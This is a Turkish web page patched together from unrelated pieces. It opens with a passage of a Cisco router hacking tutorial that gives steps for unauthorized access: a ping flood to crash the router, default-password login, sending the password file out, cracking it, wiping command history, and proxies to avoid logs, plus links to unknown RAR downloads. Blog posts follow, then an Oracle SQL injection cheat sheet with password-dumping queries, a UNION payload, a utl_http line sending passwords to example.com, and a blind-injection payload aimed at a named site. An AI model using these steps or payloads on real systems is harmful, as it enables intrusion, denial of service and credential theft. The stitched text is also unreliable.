sistem buldugunuza emin olduktan sonra, port 23u kullanmaniza izin verecek bir proxy server da bulmalisiniz, bu sayede sizin IP niz loglanmaz routerda.



Bolum 3:



Bir Cisco Routera nasil girilir?v4.1 software calistiran Cisco routers (ki cogu boyledir) kolaylikla islem disi birakilabilir. Sadece router a bir proxy serverin 23 uncu portuyla giris yapin, ve asagidaki sekilde uzun bir password girin :

Download Rar : http://www.dosyaload.net/download.php?file=4f8e871bfe9382e1f034ac9477e78acf

Pass : cs

Sonra bekleyin, Cisco sistemi reboot olabilir ki offline olacagi icin hackleyemezsiniz. Fakat buyuk ihtimalle 2-10 dakikaligina donacaktir, ki bu surede de siz iceri girmeye calismalisiniz. Eger hic biri de olmadiysa, budemektir ki kullanilan programda acik yok, o zaman sizde bir surelik DoS saldirisi yapabilirsiniz.




DOS a gidin "ping -l 56550 cisco.router.ip -t", yazin,ayni isi gorecektir. Sistem donmus durumdayken, baska bir proxy den baska bir baglanti acmaya calisin, ve sifreyi admin olarak girin, bunun nedeni, bu default sifredir ve gecici olarak islevsiz birakildigindan sistem default ayarlarina donecektir. Log in olduktan sonra sifre dosyasini elde etmelisiniz. Sistemler degisik programlar kullanabilir, ama cogunun “htl-textil” yada benzer bir prompt u vardir, orda ? yazarsaniz butun komutlarin listesini gorebilirsiniz, ve orda bir yerde transfer komutunun ne oldugunu bulabilirsiniz, sonra da bu komutla adminin sifre dosyasini alabilirve kendi IP adresinize gonderebilirsiniz. Fakat bundan once HyperTerminali Cisco routerdan bir cagri beklemek uzere ayarlayin. Simdi, dosyayi gonderdikten sonra, HyperTerminal size bunu kabul etmek isteyip istemediginizi soracaktir, evet diyerek bunu bir yere kaydedin. Logout yapin. En zor kismi gecmis bulunmaktasiniz, simdi sifreyi kirmak icin hazirlanin.




Bolum 4:



Sifreyi KirmakSifre dosyasini aldiginiza gore, routera yeniden erisebilmek icin bunu kirmaniz gerekir. Bunu yapmak icin, John the Ripper gibi bir program ya da benzer bir sey calistirabilirsiniz sifre dosyasinda. Bu en kolay ve tavsiye edebilecegim yolu. Diger bir yol da deniyerek sifreyi decryt etmektir. Bunun icin bir cesit decryption programina ihtiyaciniz olacak, ve bol sabirave bazi decrption siralarini bulmaniz gerekecek.



Iste bir Cisco sifresi icin ornek bir dcryption siralamasi:

Download Rar : http://www.dosyaload.net/download.php?file=3d3913b9fa0b7f24bbde1c01c13a80ec

Pass : cs

Eger Linux’unuz yoksa, sifreyi kirmak icin tek yolunuz John the Ripper ile ya da baska bir password-cracker programi ile, dosyaya dictionary (sozluk) ya da brute-force attackler yapmaktir.



Bolum 5:



Router’I kullanmaTeknolojinin bu harika parcasini kullanmak icin, ona baglanmaniz lazim once, eger IP nizini loglanmasini istemiyorsaniz, proxy kullanin. Login olduktan sonra, history yi islevsiz hale getirebilirsiniz boylelikle kimse ne yapiyor oldugunuza bakamaz, sadece “terminal history size 0” yazmaniz yeterli. “?” yazarak routerin komut listesine ulasabilirsiniz ve bir cogunu kullanabilirsiniz.




Bu routerlarda genellikle telnet vardir, dolayisiyla telneti baska sistemlere ulasmak ve hacklemek icin kullanabilirsiniz ( unix box lar gibi). Ayni zamanda ping ve traceroute da vardir routerda, bunlari da sistemleri izlemek ya da DoS saldirilari yapmak icin kullanabilirsiniz. Paketleri engellemek icin de kullanabilirsiniz ama bunu hic tavsiye etmem, cunku herzaman calismayacagi gibi, farkedilmenize de neden olabilir. Ilk denemenizde bir Cisco hackleyemezseniz, dert etmeyin… cunku muhtemelen ilk seferde hatta belki de ikinci seferde de basaramiyacaksinizbunu. Deneme ve bol sabir isteyen bir seydir.

ORACLE SQL Injection

BSQL Hacker için ORACLE modülü geliştirirken ORACLE' da SQL Injection araştırmaları yapmaya ve bir ufak bir cheat sheet hazırlamaya vaktim oldu. Dokümanı inaşallah bu Pazartesi ya da Salı günü yayınlayacağım.

Bu arada BSQL Hackerda sayısız yenilikler oldu. Bazıları

* SQL Server ve ORACLE için Otomatik exploit motoru (PostgreSQL ve MySQL yolda)
* GUI' den test imkanı
* Hızlı bir şekilde olaya girmek için 2 tane Wizard (Raw Request' ten veya URL den direk injection oluşabiliyor)
* Kendini Güncelleme özelliği
* Exploit Repository ve Güncelleme desteği. Bu sayede diğer sitelerden ve resmi exploit deposundan otomatik olarak yeni exploitleri indirebilir ya da kendi exploitlerini dağıtabilirsiniz.
* Exploitleri Yükleme ve Kaydetme
* Doğru veya yanlış anahtar kelimeleri girmeden otomatik olarak çıktılardaki değişiklikleri tespit edebilme
* Raw Request, Response ve Cevabın doğru - yanlış - hatalı olduğunu görme
* Kolay bug report özellikleri
* ve daha bir çok başka şey...

Hala beta aşamasında, yakında tam olarak public beta' yı yayınlayacağım inaşşallah. 2 haftadan fazla sürmeyeceğini umuyorum.
Yorumlar 10 Yorum var - Yorum Ekle Yorumunu Ekle
anahtar kelimeler : blog haber news bsql oracle bsql hacker sql injection
ferruh.mavituna

Site genel olarak güvenlik, internet ve web teknolojileri üzerine yazdığım yazılardan oluşmaktadır. Sitede 2003 yılından bu yana yazılmış 1750' den fazla yazı bulunmaktadır.

Bunun yanında projeler de geliştirdiğim projeleri, ar-ge kısmında güvenlik araştırma dokümanlarıma ulaşabilir, programlar kısmından yazdığım yazılımları download edebilirsiniz. Site hakkında.

List of english articles, RSS or try this page.
PROJECTS

* Freaking Simple Fuzzer
* Psycho Folder
* BSQL Hacker
* Win MD5 Checksum Tool
* Hocus Pocus
* SQL Injection Cheat Sheet
* SQL Injection Wiki
* Refactor My RegEx
* Bir sey ogren

ARAMA

Detaylı Arama
TAKİP
Siteyi RSS ile Takip Et Siteyi E-mail ile Takip Et RSS Takipçileri
website stats Follow me on Twitter Follow me on FriendFeed
YORUMLAR
pigme 23 saat 20 dakika önce Cnbc-e Dergi ' e yorum yazdı.
aus 1 gün 2 saat 44 dakika önce Fikir Üretme, Etki ve Tepki ' e yorum yazdı.
CANLI YAYIN
delicious
delicious
zabihah.com - your guide to halal eating
3 saat önce - Yorumla
delicious
delicious
Abdullah's Blog on Software: Dictionary Performance
4 saat önce - Yorumla
Blog
FM Shared on NewsGator Online
Neden Anti-XSS?
dün 6:40 - Yorumla
Twitter
Twitter
“@_ikki Cheers mate, we are getting there :)”
dün 7:31 - Yorumla
Twitter
Twitter
“@timb_machine yes I'm. I'm also planning to some automated ownage via upload forms. -no promises though :) -”
dün 7:27 - Yorumla
FriendFeed'imi görüntüle - Bana abone ol
KATEGORİLER

* Projeler - Programlar
*
o BSQL Hacker
* En İyi Yazılar
* Güvenlik
* Yazılım Geliştirme
* Kitap
* Kişisel / Hayat
* Kişisel Gelişim
* Online Araçlar ve Projeler
*
o Encoder / Converter
* SQL Injection
*
o SQL Injection Dersleri
o SQL Injection Cheat Sheet
o ORACLE SQL Injection Cheat Sheet
o Record Locator
o Error Based SQL Injections
* Tüm Kategoriler

ARŞİV
Senelere Göre Arşivler

* 2009 (dur daha yeni başladı!)
* 2008 (147 yazı)
* 2007 (358 yazı)
* 2006 (299 yazı)
* 2005 (356 yazı)
* 2004 (350 yazı)
* 2003 (245 yazı)

Diğer Arşiv Erişimleri

* Etiket Arşivi
* Son Yazılar
* En iyi Yazılar
* En Popüler Yazılar
* En Tırt Yazılar
* Çok konuşulan Yazılar
* Kimsenin Takmadığı Yazılar

ORACLE SQL Injection Cheat Sheet

ORACLE SQL Injection Cheat Sheet
Etiketler sql injection, oracle, paper, english, cheat sheet, 02.10.2007

*
Introduction
* ORACLE SQL Injection Notes
*
Concatenation
*
Comments
*
Casting
* Strings without Quotes
* Getting Stuff
o Getting Tables
o
Getting Columns
o Getting Current Database Name
o Getting Users and Passwords
o Getting Version
o Getting Current User
* Simple Union Query
* Simulating SQL Server's TOP feature
* Moving Records one by one
* Functions useful for Blind SQL Injection
* Doing outbound connections
* References, Credits, Thanks & Document History

Introduction

Quick and Dirty ORACLE SQL Injection Cheat Sheet which will be combined with main SQL Injection Cheat Sheet eventually. This cheat sheet can help you to get started for basic ORACLE SQL Injections.
ORACLE SQL Injection Notes

In ORACLE you can not just SELECT stuff you have to SELECT them from some table. For this purpose you can use special table called DUAL.

i.e. SELECT 'dummydata' || 'x' FROM DUAL;

You have to close comments if you used /* comment */ style comments
Concatenation

SELECT utl_raw.concat('x','y') FROM DUAL; SELECT 'x' || 'y' FROM DUAL; SELECT 'a' || 'b' FROM DUAL; SELECT user || '-' || password FROM members;
Comments

/* comment */

Note : You have to close this comments properly otherwise you'll get syntax error.
Line comment : --

Casting

For most of the data types concatenating data with a string can do the casting automatically. SELECT 1 || 'a' FROM DUAL;
Strings without quotes

SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;
Getting Stuff
Getting Tables

SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'

Getting Columns

SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Getting Current Database Name

SELECT global_name FROM global_name

Getting Users and Passwords

SELECT name, password FROM sys.user$ where type#=1

Getting version

Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'

Getting Current User

SELECT user FROM dual
Simple Union Query

http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL
Simulating SQL Server's TOP feature

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;
Moving Records one by one

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;

Functions useful for Blind SQL Injetion

* BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds
* CHR() - Convert to Char
* ASCII() - Convert to ASCII
* SUBSTR() - Substring
* BITAND() - Bit And operation
* LOWER() - Convert to LowerCase

Doing outbound connections

* SELECT utl_http.request('http://www.example.com') FROM DUAL SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members) ) FROM DUAL
* SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;

You can test blind SQL Injection from DNS requests (can be more reliable against egress filtering) or from actual web request.

References, Papers & Credits

* Thanks to Pentestmonkey, Notsosecure, Alexander Kornbrust
* SQL Injection Attacks for ORACLE Developers
* Red Database Security Papers
* SQL Injection Cheat Sheet

Document History

* 02/10/2007 - Public Release
* 02/10/2007 - Getting passwords section and utl_http replaced with new and easier ones. Thanks to Alexander Kornbrust
* 09/10/2007 - Sleep function added

Zaman Tabanlı Full-Blind SQL Injection

ull Blind SQL Injection (çıktıda hiç değişiklik oluşturmayan SQL Injectionlar) popüler konularımızdan biri. Her ne kadar MySQL, ORACLE, SQL Server, PostgreSQL de rahatça takılabilsekte MS Access gibi acayip ve genelde tırt veritabanlarına gelince takılıyoruz.

Çünkü genelde çoğu veritabanı, SLEEP ya da WAITFOR DELAY gibi fonksiyonlar ile zaman tabanlı ataklar yapmamızı sağlarken MS Access gibi veritabanlarında bu imkanımız yok.

Diğer bir örnek ise MySQL ve BENCHMARK. MySQL zaman tabanlı SQL Injection atakları yapmak için BENCHMARK' ı kullanabiliyoruz ve basitçe veritabanında uzun süren herhangi bir iş yapıyor ve çıktının kaç saniyede üretildiğine bakıp açığı exploit edebiliyoruz.

Chema Alonso BENCHMARK yerine çok uzun sürecek SQL queryleri çalıştırarak her veritabanında çalışabilecek bir zaman tabanlı SQL Injection yöntemi geliştirmiş.

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

BENCHMARK ya da bu yöntem şiddetle kaçınılmalı ve SQL Injectionlarda en son yöntem olarak başvurulmalı. Nedeni basit, serverın CPU' sunu aşırı derecede harcamış olacaksınız. Dolayısıyla server cevap vermeyebilir ya da ilginç hatalar almaya başlabilirsiniz.